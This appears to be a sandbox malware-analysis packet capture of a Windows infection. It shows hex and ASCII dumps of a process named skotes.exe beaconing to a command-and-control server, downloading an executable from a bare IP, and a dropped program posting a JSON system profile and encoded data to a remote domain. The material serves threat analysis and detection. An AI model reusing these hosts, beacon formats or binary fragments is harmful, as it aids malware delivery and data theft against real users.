                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e0 55 60 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 3e 44 00 00 2e 64 00 00 32 00 00 00 30 b6 00 00 10 00 00 00 50 44 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 60 b6 00 00 04 00 00 e5 ce 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 90 61 00 73 00 00 00 00 80 61 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 1b b6 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 1a b6 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELU`g(>D.d20PD@`D@ _asa, pa>(@.rsrcaN(@.idata aP(@ 8aR(@ahvfevpipT(@qgsnhtie D@.taggant00"D@
                                                                                                                                                              Dec 18, 2024 11:47:42.741102934 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Dec 18, 2024 11:47:42.741115093 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Dec 18, 2024 11:47:42.741153002 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Dec 18, 2024 11:47:42.741168022 CET896INData Raw: 62 51 31 de 75 1a e8 6d ca 82 b4 c3 fb c2 61 8e 9e fc fe 81 9e 88 9d 6b ac 42 d2 59 ed 3d 7b f5 a2 71 0a 86 f0 ec d9 b6 c4 e4 0e 41 c1 dc 19 de 98 ce a8 f5 7b d7 ea 6b 1e be 1e 6c aa 8c 1e 77 82 ab 29 03 53 dd cd 54 a5 04 89 ae 54 7f 70 6c 86 d1
                                                                                                                                                              Data Ascii: bQ1umakBY={qA{klw)STTplf7?\?j.btK_lm|]5${-!>Z/Z~iBqrKB`iA[nPO$lQr*aeg~"#<peRKT=/^g'"i
                                                                                                                                                              Dec 18, 2024 11:47:42.741283894 CET1236INData Raw: 8d fa 2a 1d 9c db 00 ff b0 6f 62 7a 27 6a 1a 0e 75 29 70 9b e7 ab 68 76 5a a4 6a c2 61 3d c7 4d 42 f3 be 24 74 04 3e 12 af f5 30 5d 1e f1 f2 68 f6 71 cd c5 4c df 92 cb 5b e1 9f 2e 5a 13 51 0a e9 fb 66 78 48 1f 9b 72 0a 3f d7 3c 36 42 6e 80 cf 7c
                                                                                                                                                              Data Ascii: *obz'ju)phvZja=MB$t>0]hqL[.ZQfxHr?<6Bn|"^2?RQ[Xm1h{l%xmf#ZTJYadld=Z|OwixNMW;WY[E@>`QJ%`muGf.Ma]`skKgV
                                                                                                                                                              Dec 18, 2024 11:47:42.741311073 CET1236INData Raw: 77 74 e6 c2 ad 00 a6 2c e6 6e 58 c5 f2 a1 d7 06 58 fe 8d 54 c7 04 b9 da cc e1 ba ac ef 2e 20 e1 dd 3f 67 12 ea a7 4f 73 c5 bf e9 2e 8f ef cd 36 d5 26 a0 e0 07 cc 60 11 3d 42 21 c7 8c 75 63 bf 81 57 cd 2a 3b 81 4c f7 78 2b 7c 98 47 d3 b5 5a e3 8c
                                                                                                                                                              Data Ascii: wt,nXXT. ?gOs.6&`=B!ucW*;Lx+|GZj.H4 ZSbyjyBh-8M<M{*pRRBGzVkVcAFn1hJ=w^h^_3<<^ZCw=ypZ<
                                                                                                                                                              Dec 18, 2024 11:47:42.741322994 CET1236INData Raw: 8a 73 47 a2 23 40 e5 64 b9 1e b3 5c 26 95 8a 8c a2 04 58 af 48 38 3f ed b5 1f 80 d1 b9 f3 de cc fe d9 95 a0 65 3b 84 ba 5c b2 91 d7 64 8b e1 a6 aa 2f 4d 92 4e d1 cd f9 3c c0 b0 5b b6 f8 4e 97 b2 5f fb ed a4 20 63 5f 13 ec 1f 2c b3 3e b1 ff 57 3d
                                                                                                                                                              Data Ascii: sG#@d\&XH8?e;\d/MN<[N_ c_,>W=SM+L[? 1fkW?K*M!h.louF'LX1$dZ@r^PJ|d-5B8lfc`cMZWNsaP
                                                                                                                                                              Dec 18, 2024 11:47:42.741420984 CET1236INData Raw: fe 71 01 cc c5 44 c6 62 a6 e0 4b f5 95 d2 55 39 4b 01 f6 75 e4 0f 30 9c fb 36 18 74 b4 e5 2e 2f be e1 57 07 cc 82 39 dc 25 ff a5 4c 8c c1 ef 58 0e 33 ae f4 2a 48 b8 17 2d d5 9e cd 98 02 e8 e8 82 f1 af 43 9c dd ee c6 c4 42 5d 4d fa e4 09 5b b9 28
                                                                                                                                                              Data Ascii: qDbKU9Ku06t./W9%LX3*H-CB]M[(pz HIZ,1/w#Y,m(%TR3@X|0ZpdhM-pk05OhhnJ~C6a=>sB
                                                                                                                                                              Dec 18, 2024 11:47:42.741432905 CET1236INData Raw: 96 93 3d f2 a9 8f 6f f5 8f 55 b2 95 65 9b af 26 1f 6a 99 d3 08 04 87 13 2d e7 8d 6e fb d6 c6 0d 52 a5 95 05 50 f3 c9 3a 95 4f 3a ed 16 b4 4d 03 18 9c 4e 7e 36 8a 2c 49 d2 82 35 fd 10 fc 70 79 7c d7 93 6c 68 86 2e 17 92 4b 8b 7f f7 d4 85 f5 f4 d4
                                                                                                                                                              Data Ascii: =oUe&j-nRP:O:MN~6,I5py|lh.Ki?wX`n/w^{vm5c<J6/wLkL,&b{db3Cz!j$DcGOCtYv!MhnHwO{?{XDBy%'A/
                                                                                                                                                              Dec 18, 2024 11:47:42.861066103 CET1236INData Raw: 93 e7 50 a3 c5 fa 97 1d e3 19 48 e1 7c 0f 0f 14 af f7 33 b3 30 57 65 2c 63 e5 8d c7 e1 bb 34 72 eb 0c 9f 7f e1 ac 62 a8 ad 90 f2 03 ea fd 46 43 fe 0a c1 5e e2 f7 1a c6 f7 56 92 97 6a a6 4d 70 1d ff 62 fa 8d 0c 95 03 07 74 2c 6b a0 91 5f 73 2c 8e
                                                                                                                                                              Data Ascii: PH|30We,c4rbFC^VjMpbt,k_s,>kEOyzy6w0]uB/$7gfiG9O/2_XLe$1bSQ3;|gE5@;\70L}CmE/{GP


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              9192.168.2.649906185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:52.225466967 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 31
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 36 38 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                              Data Ascii: d1=1016878001&unit=246122658369
                                                                                                                                                              Dec 18, 2024 11:47:53.569057941 CET193INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:53 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              10192.168.2.64991031.41.244.11806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:53.692250013 CET59OUTGET /files/fate/random.exe HTTP/1.1
                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.009430885 CET1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:54 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Content-Length: 776832
                                                                                                                                                              Last-Modified: Tue, 17 Dec 2024 09:45:14 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6761482a-bda80"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED]
                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bssp@
                                                                                                                                                              Dec 18, 2024 11:47:55.009485960 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Dec 18, 2024 11:47:55.009497881 CET448INData Raw: ec 30 8b 5c 24 44 a1 c0 57 42 00 31 e0 89 44 24 2c 8b 43 3c 8b 6c 18 78 8b 44 1d 18 85 c0 0f 84 4f 01 00 00 8b 4c 1d 20 01 d9 89 4c 24 08 48 89 44 24 10 c7 04 24 00 00 00 00 89 5c 24 04 89 6c 24 0c 8b 44 24 08 8b 30 01 de 0f 57 c0 f2 0f 11 44 24
                                                                                                                                                              Data Ascii: 0\$DWB1D$,C<lxDOL L$HD$$\$l$D$0WD$$WD$V(w"|$$D$(WVt$VfSCErPPD$|$$l$(WVPe\$Dl$t$h5Vm
                                                                                                                                                              Dec 18, 2024 11:47:55.009582996 CET1236INData Raw: 00 02 00 00 31 c9 88 8c 0c 00 01 00 00 89 c8 99 f7 fe 8a 04 17 88 04 0c 41 81 f9 00 01 00 00 75 e5 31 c0 31 c9 8a 94 04 00 01 00 00 00 d1 02 0c 04 0f b6 f1 8a b4 34 00 01 00 00 88 b4 04 00 01 00 00 88 94 34 00 01 00 00 40 3d 00 01 00 00 75 d4 83
                                                                                                                                                              Data Ascii: 1Au1144@=u$1111QQQ(9BCIuhMBheB~P:C$09G9$
                                                                                                                                                              Dec 18, 2024 11:47:55.009594917 CET1236INData Raw: c4 0c 01 e7 83 c7 10 eb 4b 89 f9 83 c9 0f 83 f9 17 be 16 00 00 00 0f 43 f1 8d 46 01 81 f9 ff 0f 00 00 72 08 50 e8 0f 01 00 00 eb 06 50 e8 ef 11 00 00 83 c4 04 89 c3 89 44 24 10 89 7c 24 20 89 74 24 24 57 55 50 e8 c4 5f 00 00 83 c4 0c 01 df 8d 5c
                                                                                                                                                              Data Ascii: KCFrPPD$|$ t$$WUP_\$h5SmD$$r1L$prQ) $VQTWuED$D$E$(L$I!UW49BD$$4$t$
                                                                                                                                                              Dec 18, 2024 11:47:55.009605885 CET1236INData Raw: 51 e8 8c 44 00 00 83 c4 08 c7 06 88 c3 41 00 f2 0f 10 47 0c f2 0f 11 46 0c 89 f0 5e 5f c2 04 00 cc 56 89 ce 8b 44 24 08 c7 01 28 c1 41 00 83 c1 04 31 d2 89 56 08 89 56 04 83 c0 04 51 50 e8 4f 44 00 00 83 c4 08 c7 06 a8 c3 41 00 89 f0 5e c2 04 00
                                                                                                                                                              Data Ascii: QDAGF^_VD$(A1VVQPODA^xdBdBd,;`VBhxdBP=xdBuh@hxdB|V|$tV^BUSWVPt$D$uJWFFj \
                                                                                                                                                              Dec 18, 2024 11:47:55.009618998 CET672INData Raw: e0 89 44 24 18 8b 1f 8d 74 24 3c 83 7e 10 00 74 0e 89 f1 6a 02 68 51 03 42 00 e8 92 00 00 00 8b 4f 08 8b 01 89 e5 ff 77 04 55 ff 50 08 8b 45 10 83 7d 14 10 72 03 8b 2c 24 89 f1 50 55 e8 6f 00 00 00 8b 44 24 14 83 f8 10 72 2c 8b 0c 24 8d 68 01 81
                                                                                                                                                              Data Ascii: D$t$<~tjhQBOwUPE}r,$PUoD$r,$hrQ) sF$UQ:WCWFC7L$1K^_[]USWVL$ ]U)959;$x
                                                                                                                                                              Dec 18, 2024 11:47:55.009717941 CET1236INData Raw: c2 c1 e2 02 eb 05 ba 04 00 00 00 8b 06 8b 48 04 0b 54 0e 0c 31 c0 83 7c 0e 38 00 8d 0c 0e 0f 94 c0 c1 e0 02 09 d0 6a 00 50 e8 0f f7 ff ff 89 e1 e8 62 f6 ff ff 8b 4c 24 08 31 e1 e8 0d 06 00 00 89 f0 83 c4 0c 5e 5f c2 04 00 cc 53 57 56 83 ec 0c 0f
                                                                                                                                                              Data Ascii: HT1|8jPbL$1^_SWVt$WB1D$A0HOPW;VR OtPtjL$1^_[SWVt$WB1D$L$j|dB$eBdPu3
                                                                                                                                                              Dec 18, 2024 11:47:55.009730101 CET1236INData Raw: 04 31 d2 89 56 08 89 56 04 83 c0 04 51 50 e8 37 38 00 00 83 c4 08 c7 06 c8 c5 41 00 89 f0 5e c2 04 00 cc c7 01 28 c1 41 00 83 c1 04 51 e8 7b 38 00 00 83 c4 04 c3 b8 80 64 42 00 c3 b9 b8 64 42 00 e8 96 04 00 00 68 4c b8 41 00 e8 ec 01 00 00 59 c3
                                                                                                                                                              Data Ascii: 1VVQP78A^(AQ{8dBdBhLAYhVAYh`AYeBhhjAYVWj3^YfBjVfBAihtAY_^jjhfBeBh~AeYeBiBhA
                                                                                                                                                              Dec 18, 2024 11:47:55.009742975 CET1236INData Raw: 50 e8 df 24 00 00 59 c3 33 c0 57 8b f9 40 f0 0f c1 05 0c 58 42 00 75 19 56 be c0 64 42 00 56 e8 90 24 00 00 83 c6 18 59 81 fe 80 65 42 00 75 ee 5e 8b c7 5f c3 83 c8 ff f0 0f c1 05 0c 58 42 00 79 19 56 be c0 64 42 00 56 e8 7b 24 00 00 83 c6 18 59
                                                                                                                                                              Data Ascii: P$Y3W@XBuVdBV$YeBu^_XByVdBV{$YeBu^UQjYteBEAeBVWyp7Btj17B_^VeBV0Y5eBu^UVjjuYY
                                                                                                                                                              Dec 18, 2024 11:47:55.129379988 CET1236INData Raw: 0c 8d 4d f4 ff 75 08 e8 91 00 00 00 68 04 43 42 00 8d 45 f4 50 e8 ab 28 00 00 cc 55 8b ec 56 ff 75 08 8b f1 e8 fa e6 ff ff c7 06 54 cb 41 00 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 8d 46 04 c7 06 28 c1 41 00 50 e8 ba 2e 00 00 f6 45 08 01 59 74 0a
                                                                                                                                                              Data Ascii: MuhCBEP(UVuTA^]UVF(AP.EYtjV8YY^]UQVuu`A^UVu`A^]UQVuuA^aaAB$AUEM#P+w]


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              11192.168.2.649919185.185.71.170803220C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:57.883663893 CET12360OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                                                                                                                              Host: home.twentytk20pn.top
                                                                                                                                                              Accept: */*
                                                                                                                                                              Content-Type: application/json
                                                                                                                                                              Content-Length: 502431
                                                                                                                                                              Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 31 38 38 37 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                                                                                                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "1734518874", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", "pid": 9 [TRUNCATED]
                                                                                                                                                              Dec 18, 2024 11:47:58.003741980 CET4944OUTData Raw: 2f 5a 63 64 79 34 4a 43 58 73 4a 32 75 76 6c 5c 2f 69 50 39 6b 66 55 44 35 6b 5c 2f 67 48 78 78 6f 32 75 63 53 4e 46 6f 6e 69 32 44 5c 2f 68 44 4e 5a 6c 66 4f 36 4b 33 74 4e 51 6b 75 74 55 38 49 7a 4b 71 5a 52 37 37 56 5c 2f 45 58 68 73 53 53 4b
                                                                                                                                                              Data Ascii: /Zcdy4JCXsJ2uvl\/iP9kfUD5k\/gHxxo2ucSNFoni2D\/hDNZlfO6K3tNQkutU8IzKqZR77V\/EXhsSSKGWyjEgSPzck8ZOCs0ahiK+PyOU2vZ\/21hYUqMl1nPF4GvmGCw0ErNzxmJw6trryy5fez7wC8QsljKeGw+W8Rwpq9X\/V\/GVK1eL+zCngczwuV5hi6ktVGGBwmKldWaTlHm+O6K7nxl8M\/iB8PniHjPwjrmgW9z
                                                                                                                                                              Dec 18, 2024 11:47:58.003781080 CET2472OUTData Raw: 39 5c 2f 77 44 35 7a 33 39 36 6d 2b 39 49 79 4f 38 61 65 59 65 49 5c 2f 77 44 58 39 75 66 38 6e 6b 55 52 48 64 47 38 32 7a 59 6e 2b 75 35 50 5c 2f 4c 78 39 50 36 5c 2f 7a 6f 32 76 4a 6a 65 6e 7a 39 63 5c 2f 2b 32 76 38 41 50 2b 6c 42 70 54 36 5c
                                                                                                                                                              Data Ascii: 9\/wD5z396m+9IyO8aeYeI\/wDX9uf8nkURHdG82zYn+u5P\/Lx9P6\/zo2vJjenz9c\/+2v8AP+lBpT6\/IhbZ8mzzNnm+V9n\/AOW+D\/n1575o\/wBXsTf\/AKuK4l\/z9Mfp26U\/5\/Mf\/lmkh6x\/4UP\/AHU+d+Zf9aIP5e\/1oNCsg8uR9iHeew+y8\/bOf8\/5NGf3m90kR82\/m3H\/ACwx3\/r\/AJ4o2o+\/Yn
                                                                                                                                                              Dec 18, 2024 11:47:58.003878117 CET4944OUTData Raw: 2f 6a 46 66 6e 54 5c 2f 68 31 34 69 64 47 43 79 33 55 56 70 59 52 67 6e 47 5c 2f 37 5a 66 57 30 4d 36 6a 75 54 39 6c 61 64 73 44 71 46 50 51 5a 49 2b 42 6c 58 64 6e 74 69 76 36 39 2b 69 7a 68 4b 38 75 47 2b 4b 4d 37 78 46 57 74 57 71 35 6c 6e 31
                                                                                                                                                              Data Ascii: /jFfnT\/h14idGCy3UVpYRgnG\/7ZfW0M6juT9ladsDqFPQZI+BlXdntiv69+izhK8uG+KM7xFWtWq5ln1DBe0rVKlSUo5Xl9KqnF1JStBPM5Qio2inGUUlyn8I\/TOx+Hjxbwbw7haVChRyjhrE5h7LD0adKEJ5zmdajJSVKMU6ko5PCcnK82pxk2+ZEP7v\/ADmo6nZU7dPy\/wAP5Utf1IfxmR+X7\/p\/9enfP\/s\/rTqK
                                                                                                                                                              Dec 18, 2024 11:47:58.004081964 CET4944OUTData Raw: 30 58 5c 2f 72 6c 5c 2f 51 55 7a 35 32 39 76 30 5c 2f 38 41 72 30 47 67 73 6d 37 4f 37 5a 73 5c 2f 37 5a 59 5c 2f 7a 36 31 56 77 2b 4e 33 38 58 30 37 34 36 2b 76 58 32 7a 33 71 57 54 74 5c 2f 72 4f 5c 2f 39 4b 62 49 72 38 70 31 35 5c 2f 31 6e 2b
                                                                                                                                                              Data Ascii: 0X\/rl\/QUz529v0\/8Ar0Ggsm7O7Zs\/7ZY\/z61Vw+N38X0746+vX2z3qWTt\/rO\/9KbIr8p15\/1n+f06\/wA6Dr535f18yvznfs\/7Z4\/cf\/q\/znNQfJ8\/+s7\/AE\/z\/THbNXPJz\/rCG\/l+lVpI\/vb\/AL\/Hp\/n64oNSH0RP+Wf+q\/z\/APq9uKYA7fdTzD9SP1qfa\/8Auc\/6v\/lv09s9ag8t\/k\/j
                                                                                                                                                              Dec 18, 2024 11:47:58.004194021 CET4944OUTData Raw: 71 4b 52 32 73 7a 51 69 37 6c 69 6a 6d 75 6c 67 6a 6c 6b 62 62 6e 7a 72 39 71 6e 78 44 6f 58 69 58 39 6b 66 39 71 33 55 66 44 32 73 36 58 72 75 6e 6a 77 42 34 6d 74 7a 66 36 52 66 32 32 70 57 4a 6e 54 34 66 65 48 35 4a 49 6b 76 4c 4f 53 61 33 6b
                                                                                                                                                              Data Ascii: qKR2szQi7lijmulgjlkbbnzr9qnxDoXiX9kf9q3UfD2s6XrunjwB4mtzf6Rf22pWJnT4feH5JIkvLOSa3keNZY\/MCSNsZtrYcMo\/oDIMc6niBkeFwDqVMoqeJ2HzDDYidGpTr1sLic9p\/VZ1+aNPlhVoQwtZQnSg\/aSi7K6ivF4qwrp+F\/EtXHxo083peF+a4PE0YVadSnSxWH4dxUcVTouMp8zpVniaTnCpNckZK7Scj+
                                                                                                                                                              Dec 18, 2024 11:47:58.008321047 CET2472OUTData Raw: 61 5c 2f 38 41 58 39 33 70 6b 6d 66 4d 66 5c 2f 32 6e 2b 34 67 39 50 72 37 39 61 7a 4e 52 6b 65 7a 7a 44 76 7a 76 5c 2f 77 42 56 4c 5c 2f 38 41 4a 58 34 66 30 70 67 6b 4c 66 4f 6a 35 66 38 41 35 35 5c 2f 39 4f 2b 50 54 50 58 70 54 39 79 66 4f 6a
                                                                                                                                                              Data Ascii: a\/8AX93pkmfMf\/2n+4g9Pr79azNRkezzDvzv\/wBVL\/8AJX4f0pgkLfOj5f8A55\/9O+PTPXpT9yfOjv8AJL9n\/wCWv\/k1\/TrUPzrv2J5f7v8A1cf\/AC2\/0rv+n+eaDoIZG3MiJl\/+PjH8v89\/y5Z5h+4ib\/3X9Px\/07HbHcD6TKvzbBlH\/wA\/6L9aJMssz\/u8+V5XP\/X1\/k9KDoK0nMbPsKeZwP6H8KPk
                                                                                                                                                              Dec 18, 2024 11:47:58.123667002 CET4944OUTData Raw: 34 6c 68 4d 71 45 78 4d 39 72 44 49 55 4b 6c 34 6f 32 4a 51 66 69 4f 46 38 47 5c 2f 6f 37 59 50 69 37 6b 6f 63 48 38 4a 5c 2f 36 79 56 73 48 4c 4e 49 35 58 57 6e 69 63 56 67 50 71 64 4f 76 54 6f 53 78 56 44 49 63 56 69 71 32 51 55 6f 77 72 31 4b
                                                                                                                                                              Data Ascii: 4lhMqExM9rDIUKl4o2JQfiOF8G\/o7YPi7kocH8J\/6yVsHLNI5XWnicVgPqdOvToSxVDIcViq2QUowr1KVP9xgIThKcLRSlFv+jMZ4+\/SpzDgVyxHH3HX+qOGx9PJqmc4enhcFmf1\/E4bEYmngsTxNg8Fh+KK862GwuJqL6xmdSE4Uat5NxaPRpJoJvmmVFlxgkkseM4GTk4Hp25xzUJtbd\/8AVT49nxx\/jWv4R0PR\/Ft
                                                                                                                                                              Dec 18, 2024 11:47:58.123815060 CET4944OUTData Raw: 58 39 41 79 37 77 68 38 53 63 32 34 64 6f 63 56 35 64 77 6a 6d 65 4b 34 66 78 4e 47 4f 4a 77 2b 5a 55 33 68 56 43 74 68 5a 5a 6d 38 6c 6a 6a 4b 64 47 65 49 6a 69 70 59 4f 57 62 77 71 35 62 48 47 4b 67 38 4e 4c 47 34 66 46 59 64 56 58 56 77 6d 4a
                                                                                                                                                              Data Ascii: X9Ay7wh8Sc24docV5dwjmeK4fxNGOJw+ZU3hVCthZZm8ljjKdGeIjipYOWbwq5bHGKg8NLG4fFYdVXVwmJjS3vDHinx\/8M\/iL4A+MXwo8Rx+FviV8MdWvdX8L6ld2UWo6bN\/aWnzaXquk6rZShlm0zW9Nmm0nUtqPJ\/Zt5exwp5sqSR\/pPB\/wWl\/4KBQwQxSeCP2QbqSKKON7mfwp8Y1nuHRArTzLbfE63tllmIMkgt7
                                                                                                                                                              Dec 18, 2024 11:47:58.123851061 CET4944OUTData Raw: 71 76 66 5c 2f 75 5c 2f 69 55 51 53 66 76 4f 66 2b 57 77 2b 30 53 5c 2f 38 41 50 44 5c 2f 6c 36 5c 2f 44 72 5c 2f 4c 38 52 54 50 4c 79 7a 2b 54 38 6e 2b 5c 2f 4c 36 38 5c 2f 35 5c 2f 77 41 4b 6d 2b 54 7a 45 5a 50 6b 5c 2f 64 5c 2f 38 74 50 38 41
